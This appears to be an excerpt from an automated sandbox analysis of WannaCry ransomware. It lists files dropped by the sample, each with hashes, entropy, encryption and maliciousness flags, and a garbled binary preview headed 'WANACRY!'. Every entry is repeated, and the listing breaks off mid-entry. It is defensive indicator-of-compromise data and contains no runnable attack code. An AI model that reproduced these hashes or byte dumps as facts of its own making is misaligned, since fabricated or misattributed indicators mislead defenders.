                                                                              Preview:WANACRY!.......5.>.,...c.b.&. ....w&O...V).oB..r.j....|..t.DI{.jJ;...x>".g..(...e.:9...h."....d....^...1*..,^4..rQ.......\.6 C.!..m.R..."..L...82.."..}......9/D6.O...t:.....*...............NR..\..D..Zv.J..Y} .%]I.w..[A..Z.=..G..cb[v.%..._..a ~n.k;..d.I.%......P........T........nk.-......|.+}...*..e(i.s..........u.t..v.&0.X...K.....".....4.....N.....L.^.!..Yi?>.....[F......L...0...^.,.}..$..6..=.96B...%.....{......(..Ed.z.]a`..m.aYzYT.......7`.._).\P.x..h.....\O..6.....&....2........&$.)...y...R..cs...d...*3...]....E..|..X.=MO.".h.k.u...I\....K..g.\.a-;...r....<....{...I.....k|Tw..+.?.$//..<..W.....U.C0.r.......Tz*...#..1Iu...U.k..>B......7...k..[.Z.....G..).s.../W..D.....n..Q..;.9;.U...E.].S..$..!1.jJ..F....vG...=c'...0.....C.Os..R.D}U.\.VI..........a.......w"i"L.aV{z... .uI.)3.T.Zu.......Y....$.4...2.y9..-....-...t.).ipV3..../p../en..<U..Azjq..'f.t;.U.&).I..C...i.'....v.g[o;Uv..C.JX..+..Ju....7.R.$...m{.~=Nrm\.#......V.Z..t.R..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):20760
                                                                              Entropy (8bit):7.991474063378844
                                                                              Encrypted:true
                                                                              SSDEEP:384:g000M+hSNzTt5d9GsthORSr29UZ4yc4SqEjIERqZQTJZPIkvjLGA7IsiKuAI8:A0MGeCsrORSKTWEE0ukvjLGci+I8
                                                                              MD5:65437E6F26A4F9AD36A8D47FFCEC8406
                                                                              SHA1:DDD8F7C7589699698925C25855668A5916B5DE77
                                                                              SHA-256:81454DEE8F01D923DFCA114C2F03B220CC52392E5E8D0A8D7B9F1C14BCFB88B3
                                                                              SHA-512:E809A542BF16431A04EE09CA8D20A0D65BF77E17F37E84B333B898721A97D6AA8682575655EAE03B734930FD25E49B3BAC1E055F54659E6A29DB5EF0D613BD33
                                                                              Malicious:true
                                                                              Preview:WANACRY!.......5.>.,...c.b.&. ....w&O...V).oB..r.j....|..t.DI{.jJ;...x>".g..(...e.:9...h."....d....^...1*..,^4..rQ.......\.6 C.!..m.R..."..L...82.."..}......9/D6.O...t:.....*...............NR..\..D..Zv.J..Y} .%]I.w..[A..Z.=..G..cb[v.%..._..a ~n.k;..d.I.%......P........T........nk.-......|.+}...*..e(i.s..........u.t..v.&0.X...K.....".....4.....N.....L.^.!..Yi?>.....[F......L...0...^.,.}..$..6..=.96B...%.....{......(..Ed.z.]a`..m.aYzYT.......7`.._).\P.x..h.....\O..6.....&....2........&$.)...y...R..cs...d...*3...]....E..|..X.=MO.".h.k.u...I\....K..g.\.a-;...r....<....{...I.....k|Tw..+.?.$//..<..W.....U.C0.r.......Tz*...#..1Iu...U.k..>B......7...k..[.Z.....G..).s.../W..D.....n..Q..;.9;.U...E.].S..$..!1.jJ..F....vG...=c'...0.....C.Os..R.D}U.\.VI..........a.......w"i"L.aV{z... .uI.)3.T.Zu.......Y....$.4...2.y9..-....-...t.).ipV3..../p../en..<U..Azjq..'f.t;.U.&).I..C...i.'....v.g[o;Uv..C.JX..+..Ju....7.R.$...m{.~=Nrm\.#......V.Z..t.R..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):5272
                                                                              Entropy (8bit):7.962895713234551
                                                                              Encrypted:false
                                                                              SSDEEP:96:o3CccTcBgZ44gMO7PRFajX6Jaa1PwHKpj6QE13imxw/G7grbnp0+pXdjSx:wfYQAjPO7PfaOJauwI6H1xwe7grby+pW
                                                                              MD5:B3481B8667DD8F56CEF86A63CB7A02B6
                                                                              SHA1:A9286EDA73BA3E78DCF920780413C801B9AB938F
                                                                              SHA-256:14E3FFDAE269DB350D82CE81146232F70F60EA8B863A65247E19D98E80AD3F7E
                                                                              SHA-512:C10CF270E66453B84FDCC64782BD42E1AD8D1ED8E6141184161B8D802A6ED8B3C8FF4CD72872DA5655351198554DED8DE7C4420C06187AED02396AB2F29924B7
                                                                              Malicious:false
                                                                              Preview:WANACRY!....M....?.......jK....r.....u..$q..$......o_V.~jfl[...U..;z.U...F2..M.a0~.`g...n?m...n.|A.N5...g...cs`.......a5%..T4.H.z..N....#U0..I..B.*<.f{M..A]...O.E..J..md'.$: ..'.....mCS.'./...d...*....UG.UP(......\p.j.~?...@....:9xL....&;.S...c.T.'V..0....v........".."..%O._\.....l.c...@.)..),._.y.j..7.E..{^.Ors..R."9..;t.Il....l.C.H....<..e..6......=.Ks'.z;*...../9'...O.._iC.2.n.../..V..xn.O...+...X.D.M]Y.m.=..>^-._V... :B.....j.%7.^.HY.;..r@e"e.w..|E-...2W&;B..k.V........M.!.W.x.w....l....H.E.}.)l7FEee..qL.O~*.4..T.r..$...T.....f3....DRT.1..J..|.Y..Q.@..]S.b.V!.s7.*o...N.9....T.....\.w...0.nv..?....m.r.C./.$...r....Y....X...5.... xy.z..g)..aD..#@...a".....o'A4a...'....+.Td..X.c?..6Y.!R\[.u...".|.<h.\*.X.~n.%z......;.e.h.i11..^H..|...+(.-...0..S...[<7\.k...;.n..i.%.x[.R.=K.Y.b..!....Y...crf......Q....e.......C.`...C.|z[.....'.].cp.......>.@....f...lX...T..%..J...%3.J.wM.. .f...c....`..........P.J."........^.....nw.....*.|.......X(Y..]"....
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):5272
                                                                              Entropy (8bit):7.962895713234551
                                                                              Encrypted:false
                                                                              SSDEEP:96:o3CccTcBgZ44gMO7PRFajX6Jaa1PwHKpj6QE13imxw/G7grbnp0+pXdjSx:wfYQAjPO7PfaOJauwI6H1xwe7grby+pW
                                                                              MD5:B3481B8667DD8F56CEF86A63CB7A02B6
                                                                              SHA1:A9286EDA73BA3E78DCF920780413C801B9AB938F
                                                                              SHA-256:14E3FFDAE269DB350D82CE81146232F70F60EA8B863A65247E19D98E80AD3F7E
                                                                              SHA-512:C10CF270E66453B84FDCC64782BD42E1AD8D1ED8E6141184161B8D802A6ED8B3C8FF4CD72872DA5655351198554DED8DE7C4420C06187AED02396AB2F29924B7
                                                                              Malicious:false
                                                                              Preview:WANACRY!....M....?.......jK....r.....u..$q..$......o_V.~jfl[...U..;z.U...F2..M.a0~.`g...n?m...n.|A.N5...g...cs`.......a5%..T4.H.z..N....#U0..I..B.*<.f{M..A]...O.E..J..md'.$: ..'.....mCS.'./...d...*....UG.UP(......\p.j.~?...@....:9xL....&;.S...c.T.'V..0....v........".."..%O._\.....l.c...@.)..),._.y.j..7.E..{^.Ors..R."9..;t.Il....l.C.H....<..e..6......=.Ks'.z;*...../9'...O.._iC.2.n.../..V..xn.O...+...X.D.M]Y.m.=..>^-._V... :B.....j.%7.^.HY.;..r@e"e.w..|E-...2W&;B..k.V........M.!.W.x.w....l....H.E.}.)l7FEee..qL.O~*.4..T.r..$...T.....f3....DRT.1..J..|.Y..Q.@..]S.b.V!.s7.*o...N.9....T.....\.w...0.nv..?....m.r.C./.$...r....Y....X...5.... xy.z..g)..aD..#@...a".....o'A4a...'....+.Td..X.c?..6Y.!R\[.u...".|.<h.\*.X.~n.%z......;.e.h.i11..^H..|...+(.-...0..S...[<7\.k...;.n..i.%.x[.R.=K.Y.b..!....Y...crf......Q....e.......C.`...C.|z[.....'.].cp.......>.@....f...lX...T..%..J...%3.J.wM.. .f...c....`..........P.J."........^.....nw.....*.|.......X(Y..]"....
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):80552
                                                                              Entropy (8bit):7.997656025585183
                                                                              Encrypted:true
                                                                              SSDEEP:1536:hlVNuI5c58UFlLZ++39o+wb8fac8FpEO9oGfnU0QPZYX9pgu:P2ySvls+G+68mFpTZnQPAsu
                                                                              MD5:A737561215C8CBA8FE67F60CED8384AF
                                                                              SHA1:8341AB267A6664A03529A521084E5116D312ACF1
                                                                              SHA-256:BC23D105C65B1820523A16C97D194C642A081712FDFE3289F9A323F9E400D3F7
                                                                              SHA-512:49ECD57827A0184E99EEB7818C12893CAA29C04B25BCBA435707DC0F0DF2A5ABD8E261DFAFFAC805A23A3001671A8AF2DBC7950A3B5A1960A5513E065A00344F
                                                                              Malicious:true
                                                                              Preview:WANACRY!.......c.NLu.e.qc....u...{#.....X.M(.*bNc....S.....V.B..6,..p..bj.......#.x..._....A........].[..8...6..x.xN.t.zx.q..,K.....ol+rf?...Xp.....b.;V..4..V)..P..u.nl|.....=....]U.H^..QP.t.............'L..(...O.Hm.....\NIB.....1...2....o.C~isC8...g/.kb......9.......a..@....,;gg....@>,.V.6=+.)....U...s..v..6^P/.....r.~a..!..Zt..F/^A..N"...X&f.. .'WX."g...g....W.Z?7........R7.;....Y.l..0M..N>P.U7...?..v.Ama.Hf....lA.C$.I$`N[..k-.g.".......l...r............?-K.Lm}..pj....@.J.......N...y. .....(...wS]:.!..{A=7.......GCN#.&.H.(.......|...).....lP.8g.*..'.;.!@..Gw.V.=+]...m.N..b.(....39...S..H.z...).(...m..I@O.f....N.Ry.,.s2T....n@...tI.&..L:n........98....[.,..I....pI.0N.F.......3D..<,^.%k$......}..81o2......&.............W._..M.j..(..*....v..8.......~...(.c6.a.VE..6-.p...9....\..%mUoo`.[B.W?... .g..v......xF(....L>ff...&.......zO..K.4o.,t..xW..+......t..".9...jg...1.km....C|.0..J..j.B..TV....4. &...4.P.G%...........h.......J..z....h3@.l.b7.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):80552
                                                                              Entropy (8bit):7.997656025585183
                                                                              Encrypted:true
                                                                              SSDEEP:1536:hlVNuI5c58UFlLZ++39o+wb8fac8FpEO9oGfnU0QPZYX9pgu:P2ySvls+G+68mFpTZnQPAsu
                                                                              MD5:A737561215C8CBA8FE67F60CED8384AF
                                                                              SHA1:8341AB267A6664A03529A521084E5116D312ACF1
                                                                              SHA-256:BC23D105C65B1820523A16C97D194C642A081712FDFE3289F9A323F9E400D3F7
                                                                              SHA-512:49ECD57827A0184E99EEB7818C12893CAA29C04B25BCBA435707DC0F0DF2A5ABD8E261DFAFFAC805A23A3001671A8AF2DBC7950A3B5A1960A5513E065A00344F
                                                                              Malicious:true
                                                                              Preview:WANACRY!.......c.NLu.e.qc....u...{#.....X.M(.*bNc....S.....V.B..6,..p..bj.......#.x..._....A........].[..8...6..x.xN.t.zx.q..,K.....ol+rf?...Xp.....b.;V..4..V)..P..u.nl|.....=....]U.H^..QP.t.............'L..(...O.Hm.....\NIB.....1...2....o.C~isC8...g/.kb......9.......a..@....,;gg....@>,.V.6=+.)....U...s..v..6^P/.....r.~a..!..Zt..F/^A..N"...X&f.. .'WX."g...g....W.Z?7........R7.;....Y.l..0M..N>P.U7...?..v.Ama.Hf....lA.C$.I$`N[..k-.g.".......l...r............?-K.Lm}..pj....@.J.......N...y. .....(...wS]:.!..{A=7.......GCN#.&.H.(.......|...).....lP.8g.*..'.;.!@..Gw.V.=+]...m.N..b.(....39...S..H.z...).(...m..I@O.f....N.Ry.,.s2T....n@...tI.&..L:n........98....[.,..I....pI.0N.F.......3D..<,^.%k$......}..81o2......&.............W._..M.j..(..*....v..8.......~...(.c6.a.VE..6-.p...9....\..%mUoo`.[B.W?... .g..v......xF(....L>ff...&.......zO..K.4o.,t..xW..+......t..".9...jg...1.km....C|.0..J..j.B..TV....4. &...4.P.G%...........h.......J..z....h3@.l.b7.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):584
                                                                              Entropy (8bit):7.559385514086921
                                                                              Encrypted:false
                                                                              SSDEEP:12:bkEtTYsXWk8FiG6f7IhlRf6s7272MWd9Xh1waBAyOcmeR1lnTbH8:bkOUsLCuoJ7E2PdBb9RRPTj8
                                                                              MD5:B6F38BD7BD16FEAB18420FF2FB32E2ED
                                                                              SHA1:337887642383B8416916E024FCA4D87713AA383A
                                                                              SHA-256:39A06E1686985B7C1C919A550B71102E6AF852EF2DB53561D343A0725D9BE28A
                                                                              SHA-512:912E80590D7093FAF8CEF1C5023E2246A68A3C54CB1821653F3BE46E0C8575B4FEBD0126D1C582189C56E739366F54C711D7D92F89E7C4B64D8B41CBCCDB4A34
                                                                              Malicious:false
                                                                              Preview:WANACRY!......Y.su..?v$..M..8..r.7z......i..]..p.....[.?..h..qDx..:B.').-..I.R+..!....R..D.U...y.g.y....dt.`..t.v*N....8.....rI..|.....k....f............P;9lb..T..S......9..i.....m./......./l...<.......:/b.r.....>.p.I6..~l.b..E.^..@r..FCa..aL.]....4..+........#........iD......kIJa.li.BAcY@.......F......../.|.2.(@....!.]m........_W8....}.L....L.....u.LK>.X..h..^..N.@;...k....W..\..m.k...X..i.....%.H7F.....t.~.U.4...@..B>>5...j...tG<7...x0...#.b7..8....6ab$...U..g|.x..JK<....BH.~)~..>.....+....b.....0s..k....g)G........h...0G.U....e...o..~|.:m.....2
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):584
                                                                              Entropy (8bit):7.559385514086921
                                                                              Encrypted:false
                                                                              SSDEEP:12:bkEtTYsXWk8FiG6f7IhlRf6s7272MWd9Xh1waBAyOcmeR1lnTbH8:bkOUsLCuoJ7E2PdBb9RRPTj8
                                                                              MD5:B6F38BD7BD16FEAB18420FF2FB32E2ED
                                                                              SHA1:337887642383B8416916E024FCA4D87713AA383A
                                                                              SHA-256:39A06E1686985B7C1C919A550B71102E6AF852EF2DB53561D343A0725D9BE28A
                                                                              SHA-512:912E80590D7093FAF8CEF1C5023E2246A68A3C54CB1821653F3BE46E0C8575B4FEBD0126D1C582189C56E739366F54C711D7D92F89E7C4B64D8B41CBCCDB4A34
                                                                              Malicious:false
                                                                              Preview:WANACRY!......Y.su..?v$..M..8..r.7z......i..]..p.....[.?..h..qDx..:B.').-..I.R+..!....R..D.U...y.g.y....dt.`..t.v*N....8.....rI..|.....k....f............P;9lb..T..S......9..i.....m./......./l...<.......:/b.r.....>.p.I6..~l.b..E.^..@r..FCa..aL.]....4..+........#........iD......kIJa.li.BAcY@.......F......../.|.2.(@....!.]m........_W8....}.L....L.....u.LK>.X..h..^..N.@;...k....W..\..m.k...X..i.....%.H7F.....t.~.U.4...@..B>>5...j...tG<7...x0...#.b7..8....6ab$...U..g|.x..JK<....BH.~)~..>.....+....b.....0s..k....g)G........h...0G.U....e...o..~|.:m.....2
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):9704
                                                                              Entropy (8bit):7.979926584183988
                                                                              Encrypted:false
                                                                              SSDEEP:192:gEeJubWWgrTFpkn9AMiE8w2WK3rJ9v/yMghX+GF21N4IIFiTEJc:gObWWiFpkn9biEsx7J9kYGFdoT2c
                                                                              MD5:20F0193EFC1D260505B8973E28B03B9E
                                                                              SHA1:76D40ABE24E5185EF48BB4BEF6C8C924DCFEE7B6
                                                                              SHA-256:1CED30B4C3C8667820E78373547E982169A4971CFE0D067AEBAEF211C44CE5C9
                                                                              SHA-512:2832CF9C7D6E4D3B71B7816873B7D160D11D6EE3A65477F090A950D8C4DF4D726AE1078E3EB056EB935BF006327D5567B3B9C61218513F7B6979DE79655A05C8
                                                                              Malicious:false
                                                                              Preview:WANACRY!....r.i.....nR.k_.o.m.....w....D....@n.ID@. co+l.Pm......P.....w.J..fg.XHFv;..y....k.Mr..da........"s...8..J...a....s~.E9......*$eK....yYH...........=.._.hq.......F 6p.b&...|W.....^.0.k......^..t.#e...*.~.KS7..~nh.u..zF.D..JY.y.ii....5.*~5....\.......$......4..!T..e ..G}.p..rJ...`.......v....#.n'...T...I..$....{...5.i...G....a..2B...a<0...AkioG...~2..9...YN..6u.%. ..^..5.7zw.....<_.b.zl....A..N\,..6y.$,........B....E...%.........N..)z...k..5.%......C..y..?..."%...h.>rAL...B.X.....i=....5.-7....\....,.<.2#.."/!Ocs...N...T23W._..GN.C}.z....2....P..k.......H.!CKybg.......\..r...>..0.....6...w.;..].([....I.4w.u..y)........c..h..B.tK1...*9...Y|f..gv'?.C.'$.....U).C.4M=8m..7.Z.Ax...F6.kT...6.""....2....0)...\.TxV...<....i......E0....M }.a.m...d~._(.Z....k.k.z{I...r........J9..9...'F.iz]...;...M.sN..wP.....el...X.U........<.i.{`......E.9../.#...L.[!.8......Kt}.C.15.;...A....../...:v0;Q...DR..M.$......nET.D..Z.....X......bg..!.w.CZ..!._n..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):9704
                                                                              Entropy (8bit):7.979926584183988
                                                                              Encrypted:false
                                                                              SSDEEP:192:gEeJubWWgrTFpkn9AMiE8w2WK3rJ9v/yMghX+GF21N4IIFiTEJc:gObWWiFpkn9biEsx7J9kYGFdoT2c
                                                                              MD5:20F0193EFC1D260505B8973E28B03B9E
                                                                              SHA1:76D40ABE24E5185EF48BB4BEF6C8C924DCFEE7B6
                                                                              SHA-256:1CED30B4C3C8667820E78373547E982169A4971CFE0D067AEBAEF211C44CE5C9
                                                                              SHA-512:2832CF9C7D6E4D3B71B7816873B7D160D11D6EE3A65477F090A950D8C4DF4D726AE1078E3EB056EB935BF006327D5567B3B9C61218513F7B6979DE79655A05C8
                                                                              Malicious:false
                                                                              Preview:WANACRY!....r.i.....nR.k_.o.m.....w....D....@n.ID@. co+l.Pm......P.....w.J..fg.XHFv;..y....k.Mr..da........"s...8..J...a....s~.E9......*$eK....yYH...........=.._.hq.......F 6p.b&...|W.....^.0.k......^..t.#e...*.~.KS7..~nh.u..zF.D..JY.y.ii....5.*~5....\.......$......4..!T..e ..G}.p..rJ...`.......v....#.n'...T...I..$....{...5.i...G....a..2B...a<0...AkioG...~2..9...YN..6u.%. ..^..5.7zw.....<_.b.zl....A..N\,..6y.$,........B....E...%.........N..)z...k..5.%......C..y..?..."%...h.>rAL...B.X.....i=....5.-7....\....,.<.2#.."/!Ocs...N...T23W._..GN.C}.z....2....P..k.......H.!CKybg.......\..r...>..0.....6...w.;..].([....I.4w.u..y)........c..h..B.tK1...*9...Y|f..gv'?.C.'$.....U).C.4M=8m..7.Z.Ax...F6.kT...6.""....2....0)...\.TxV...<....i......E0....M }.a.m...d~._(.Z....k.k.z{I...r........J9..9...'F.iz]...;...M.sN..wP.....el...X.U........<.i.{`......E.9../.#...L.[!.8......Kt}.C.15.;...A....../...:v0;Q...DR..M.$......nET.D..Z.....X......bg..!.w.CZ..!._n..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):10056
                                                                              Entropy (8bit):7.981879951624906
                                                                              Encrypted:false
                                                                              SSDEEP:192:j3fgKUeeTI7mWZOInCktfZrt2zOUuFsKSSx+lAGcvD332:j3fgKUesI7ZZOInCwfZszOU7M+l6332
                                                                              MD5:964CFC998BF57366DD34851006D886E8
                                                                              SHA1:5B64065DB2591B4C617329D6BF0BB52E9888C00A
                                                                              SHA-256:5FC8A75D63ED116CE4667CA6D08FBE2C8BBB24055B50A602509E8AC18D74DF93
                                                                              SHA-512:73C7EE6351FDBBC38481C92DDF2F3A5D6BAD706F4D90857508707D7F5C31114FA9617CC9EA2655CC58CE6807206E74E3A118608F394CA30BE509CCAD444C5F89
                                                                              Malicious:false
                                                                              Preview:WANACRY!......p...b.<.e*..!.F....N.Y.u\.&D.+...'_)....E..Sg].~B.h#......,5?]... ..iq...*......P.J$Q~}r...<.\.a..jp..^#<..1..c.."...............nY.I;.T.n..0.'T....v_...b..q..........ufPU..iA..\.....T./?..^oZ.P..u..R..q....G.f......z.-O....I..+r...C./.n......*&.......{8D..$.....3.w..s..u..3.LG.I.._ds.&^Pi.Z.Bb.P5[..Q..`....7...H....2..E..s..#....BJ.X^.+.0{m|...j.>6....0.....c....FI.'....Kz[Lr<.:....$..mB..%..h..]....2.i8...M..V..W..k4(a....D.....q..nS....p....dD".:.`...|.+L.<Ds|.."f.de$..<..!..h..Mw.3:*.R.....{\... ......*....7...*.^uYB.....5M.^vV....l.z....Hd......X..{.....V.I-*]Gr.......k.*....uY.)$.O.c.D.z1.....z..g....mI..acsDuD...Z.._.;...Q.......\...hjW..........-!..p.K9....O......V.g"..yB.2.kRE.dM..P..........E.\.....=.....Q.......;.[..[.."..]..$..`...."7\.+.`o....%6.........V.`.v<Q..a;....H.%..Z.T..L..c|0..d..WN...:JN..N..X........^.......I.R."F.q."H.n...>.^)...........}........N.B...vL...7f....=....g..A0..T.........V.......
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):10056
                                                                              Entropy (8bit):7.981879951624906
                                                                              Encrypted:false
                                                                              SSDEEP:192:j3fgKUeeTI7mWZOInCktfZrt2zOUuFsKSSx+lAGcvD332:j3fgKUesI7ZZOInCwfZszOU7M+l6332
                                                                              MD5:964CFC998BF57366DD34851006D886E8
                                                                              SHA1:5B64065DB2591B4C617329D6BF0BB52E9888C00A
                                                                              SHA-256:5FC8A75D63ED116CE4667CA6D08FBE2C8BBB24055B50A602509E8AC18D74DF93
                                                                              SHA-512:73C7EE6351FDBBC38481C92DDF2F3A5D6BAD706F4D90857508707D7F5C31114FA9617CC9EA2655CC58CE6807206E74E3A118608F394CA30BE509CCAD444C5F89
                                                                              Malicious:false
                                                                              Preview:WANACRY!......p...b.<.e*..!.F....N.Y.u\.&D.+...'_)....E..Sg].~B.h#......,5?]... ..iq...*......P.J$Q~}r...<.\.a..jp..^#<..1..c.."...............nY.I;.T.n..0.'T....v_...b..q..........ufPU..iA..\.....T./?..^oZ.P..u..R..q....G.f......z.-O....I..+r...C./.n......*&.......{8D..$.....3.w..s..u..3.LG.I.._ds.&^Pi.Z.Bb.P5[..Q..`....7...H....2..E..s..#....BJ.X^.+.0{m|...j.>6....0.....c....FI.'....Kz[Lr<.:....$..mB..%..h..]....2.i8...M..V..W..k4(a....D.....q..nS....p....dD".:.`...|.+L.<Ds|.."f.de$..<..!..h..Mw.3:*.R.....{\... ......*....7...*.^uYB.....5M.^vV....l.z....Hd......X..{.....V.I-*]Gr.......k.*....uY.)$.O.c.D.z1.....z..g....mI..acsDuD...Z.._.;...Q.......\...hjW..........-!..p.K9....O......V.g"..yB.2.kRE.dM..P..........E.\.....=.....Q.......;.[..[.."..]..$..`...."7\.+.`o....%6.........V.`.v<Q..a;....H.%..Z.T..L..c|0..d..WN...:JN..N..X........^.......I.R."F.q."H.n...>.^)...........}........N.B...vL...7f....=....g..A0..T.........V.......
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):16664
                                                                              Entropy (8bit):7.989402883166124
                                                                              Encrypted:false
                                                                              SSDEEP:384:+D0r4LvPOqsQezHde8Bp8UYOk6Y2MWgWCvgv83fCZ:g08KBQezHmH4g9vi83fk
                                                                              MD5:519D60BFE492FC8809E7E31C43AAD633
                                                                              SHA1:6189058380EFA14A95557786D624137BC9EFE1FC
                                                                              SHA-256:35818D47014A03EB6E81FFCC75FDFBAC996DC94506D977235CC95ABFEAD595CE
                                                                              SHA-512:C2897527352F25B0F5462687F7353D33C2630213E7D90CCC46287627423CBE9CFBE3B71EE8DD41EC07F3A2F7D2CA00FC727460917B81DF289CD9610D181020D1
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....[.. .r.z..[.eJ..Z..5|.M.5L-[....8.3.....!.0..~>..&.....J.6.v.2O.../.~e%9......."...d..?../_*......N...e..gi9k.....w1.....F..x .k...'_=.....9.Y1.,~M @..8.z%.r..nZ<H..-.1..xV4.$..[P.XK@.o'..*.UT1..Ig..:9.....8.p.XpP.O.cj..>.....a.,.@R^.o.. ........@........,T&9J.......9.4.z..p..[..'.uX~..,.........;S.]....}A .Q.."^0.{(.T..2..9.....v.G!l$..)..*n..f'x...I......a.M..."....p....I....>.p-.U......=.I.Z.}..GY...M...%.k..E9.....b.T......ZD.M!4.....a.:...n.Y..,.Q....6..NwS..sjz..W.7.V.q.-..b........7..NT../7).S.u..Z.~e..a...^4O.-j..b..7.O...m..[.O..O..f.g"Ll...D..`.....Tk.0Jv.^..H...pBD.d..y..F...WX..5.tu..Y.... .Al..f.B.9.4R.!..fVV.;.$....]...WF...t.....46.hC.z...v..b.<...b....@.......8......2O8.a..5;-..*.......Y.......y.&....C`i..N..0.....B....cX...8.........Ad......n..f.n...yy+.F....d.....Yf......oD.)Z..pSv`8.hE...&S........G........K...I..1...Y.5.i_[.r....R.6_v..>t..w$..o.7..G...]T........l.6{y#.2.n..Z}p.]..rk..W....{.D.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):16664
                                                                              Entropy (8bit):7.989402883166124
                                                                              Encrypted:false
                                                                              SSDEEP:384:+D0r4LvPOqsQezHde8Bp8UYOk6Y2MWgWCvgv83fCZ:g08KBQezHmH4g9vi83fk
                                                                              MD5:519D60BFE492FC8809E7E31C43AAD633
                                                                              SHA1:6189058380EFA14A95557786D624137BC9EFE1FC
                                                                              SHA-256:35818D47014A03EB6E81FFCC75FDFBAC996DC94506D977235CC95ABFEAD595CE
                                                                              SHA-512:C2897527352F25B0F5462687F7353D33C2630213E7D90CCC46287627423CBE9CFBE3B71EE8DD41EC07F3A2F7D2CA00FC727460917B81DF289CD9610D181020D1
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....[.. .r.z..[.eJ..Z..5|.M.5L-[....8.3.....!.0..~>..&.....J.6.v.2O.../.~e%9......."...d..?../_*......N...e..gi9k.....w1.....F..x .k...'_=.....9.Y1.,~M @..8.z%.r..nZ<H..-.1..xV4.$..[P.XK@.o'..*.UT1..Ig..:9.....8.p.XpP.O.cj..>.....a.,.@R^.o.. ........@........,T&9J.......9.4.z..p..[..'.uX~..,.........;S.]....}A .Q.."^0.{(.T..2..9.....v.G!l$..)..*n..f'x...I......a.M..."....p....I....>.p-.U......=.I.Z.}..GY...M...%.k..E9.....b.T......ZD.M!4.....a.:...n.Y..,.Q....6..NwS..sjz..W.7.V.q.-..b........7..NT../7).S.u..Z.~e..a...^4O.-j..b..7.O...m..[.O..O..f.g"Ll...D..`.....Tk.0Jv.^..H...pBD.d..y..F...WX..5.tu..Y.... .Al..f.B.9.4R.!..fVV.;.$....]...WF...t.....46.hC.z...v..b.<...b....@.......8......2O8.a..5;-..*.......Y.......y.&....C`i..N..0.....B....cX...8.........Ad......n..f.n...yy+.F....d.....Yf......oD.)Z..pSv`8.hE...&S........G........K...I..1...Y.5.i_[.r....R.6_v..>t..w$..o.7..G...]T........l.6{y#.2.n..Z}p.]..rk..W....{.D.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):4376
                                                                              Entropy (8bit):7.957953671197071
                                                                              Encrypted:false
                                                                              SSDEEP:96:ov0GbAcbVIaULV0l4GnW2tfEBWEIjkx8QE0YVHGwydB:G0bcLU50aqWJBqjOYVHGz
                                                                              MD5:1B1F79CAB495454D111A79FE23989A53
                                                                              SHA1:7A289F23C4C1E2E60CAB352EFB5111A68B4F7D72
                                                                              SHA-256:89151EAB430B2FA4B726B9EDF19DECA7975320370FC3445781E9D9B8731BF7A7
                                                                              SHA-512:64774009453E15600ABEA9C0BFECAF97C2A51C85D0013276D75C6BE2990734BEBB39CB6E7AD2DF862845B2F456BA44C7E2DA9F7E8AD9D09BE62C91B1BF320319
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....X............v...W...2F*3.;$..T.\x{.,.....F)..*.O.E...'.t_...;x ~?..bXu....L.$...`..^..........H..a.b.....=.^q......M.&E..#$.....-.q..O.XU .y..0..,Y.@...@f..p. F.h..Bg..|.._;.g0.?..o.....C%...`.p@./R..\.|.H.O...xr..ZFi.q....V.A....S'I.~._N.lk.............*..I]......y..:....Z.a....*0.I.KW<...<?G..l..<.8R.E..I...5..5..%........yc..G...j..p..i.K7..Gy..o...G.<...'.....o..n..F...CN.....z$.d....G.Wyu.E..U9...b..?.)A....U....[.l.`../{.rg#.@..<.....G....`..2..Z....\n2...;cI.W4)...ld..&.M..d.;..Y...N.....(.7.?..8...m_6.=.5..~....<.K.........2v.....;(g..8L.....6[J..@d.P.R4^.......i.e]..Ox]D....O.*..Y...J...%8..H...t.p..A...+...d..<.......<....4{VF-._.9........w.a.^t....._2.s./..dd.....o.'.kXQ"...M}.J.X.h..A[..c..uA...^...R....U(......l.......Q.<'....^.oi.5....t.y..*.xC.F $.2I....3.~...z...r.M.k.>Z<.j!o.6.$C-..M.].........Na.N.....@o R.3..$..0._...."\R.R8.6.`..8...I^5E.<.Q.A..]J.Y.......e.6......b...........u.!....nv0K<.o...F.....W..A.=.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):4376
                                                                              Entropy (8bit):7.957953671197071
                                                                              Encrypted:false
                                                                              SSDEEP:96:ov0GbAcbVIaULV0l4GnW2tfEBWEIjkx8QE0YVHGwydB:G0bcLU50aqWJBqjOYVHGz
                                                                              MD5:1B1F79CAB495454D111A79FE23989A53
                                                                              SHA1:7A289F23C4C1E2E60CAB352EFB5111A68B4F7D72
